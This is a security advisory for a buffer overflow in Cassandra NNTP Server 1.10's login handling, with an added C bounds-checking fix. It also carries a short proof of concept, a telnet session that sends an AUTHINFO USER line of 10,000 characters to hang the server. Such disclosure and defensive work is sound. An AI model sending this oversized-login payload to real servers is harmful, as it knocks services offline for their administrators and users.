Cassandra NNTPServer v1.10 Buffer Overflow Vulnerability
BID:1156
Info
| Bugtraq ID: | 1156 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | May 01 2000 12:00AM |
| Updated: | May 01 2000 12:00AM |
| Credit: | Posted to Bugtraq on May 1, 2000 by Ussr Labs <[email protected]> |
| Vulnerable: | Atrium Software Cassandra NNTP Server 1.10 |
| Not Vulnerable: | |
Discussion
An unchecked buffer exists in the code that handles login information in the Cassandra NNTP v1.10 server. Entering a login name of more than 10 000 characters causes the server to stop responding until the administrator restarts the application.
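A bounds check of the kind the discussion says is missing, as an added example (not Atrium's code and not part of the original advisory): it rejects any command line longer than the 512-character limit RFC 977 sets for NNTP commands before anything is copied, then bounds the login name itself. The function name, return codes and the 64-character name cap are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NNTP_MAX_LINE 512  /* RFC 977 command-line limit, CR-LF included */
#define USER_MAX 64        /* assumed local cap on login-name length */

enum auth_rc { AUTH_OK, AUTH_NOT_USER_CMD, AUTH_LINE_TOO_LONG,
               AUTH_NAME_TOO_LONG, AUTH_MALFORMED };

/* Hypothetical handler: validate one received line (len bytes, need not be
 * NUL-terminated) and copy the login name into user[cap]. */
enum auth_rc parse_authinfo_user(const char *line, size_t len,
                                 char *user, size_t cap)
{
    static const char prefix[] = "AUTHINFO USER ";
    const size_t plen = sizeof prefix - 1;

    if (cap == 0) return AUTH_MALFORMED;
    user[0] = '\0';
    /* Length is checked before anything is copied. */
    if (len > NNTP_MAX_LINE) return AUTH_LINE_TOO_LONG;
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                                   /* strip CR-LF */
    if (len < plen) return AUTH_NOT_USER_CMD;
    for (size_t i = 0; i < plen; i++)            /* keyword is case-insensitive */
        if (toupper((unsigned char)line[i]) != prefix[i])
            return AUTH_NOT_USER_CMD;

    const char *name = line + plen;
    size_t nlen = len - plen;
    if (nlen == 0 || memchr(name, '\0', nlen)) return AUTH_MALFORMED;
    if (nlen >= cap) return AUTH_NAME_TOO_LONG;  /* leave room for the NUL */
    memcpy(user, name, nlen);
    user[nlen] = '\0';
    return AUTH_OK;
}

int main(void)
{
    char user[USER_MAX + 1], big[14 + 10000 + 2];  /* constructed test input */
    memcpy(big, "AUTHINFO USER ", 14);
    memset(big + 14, 'A', 10000);
    memcpy(big + 10014, "\r\n", 2);
    printf("10 000-char login: rc=%d\n",
           parse_authinfo_user(big, sizeof big, user, sizeof user));
    printf("normal login: rc=%d\n",
           parse_authinfo_user("authinfo user alice\r\n", 21, user, sizeof user));
    return 0;
}
```

The caller must also bound the read that produces `line`, so that `len` never exceeds the size of the receive buffer.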
Exploit / POC
[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed)
AUTHINFO USER <10 000 character string>
Where buffer is 10000 characters.
Solution / Fix
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].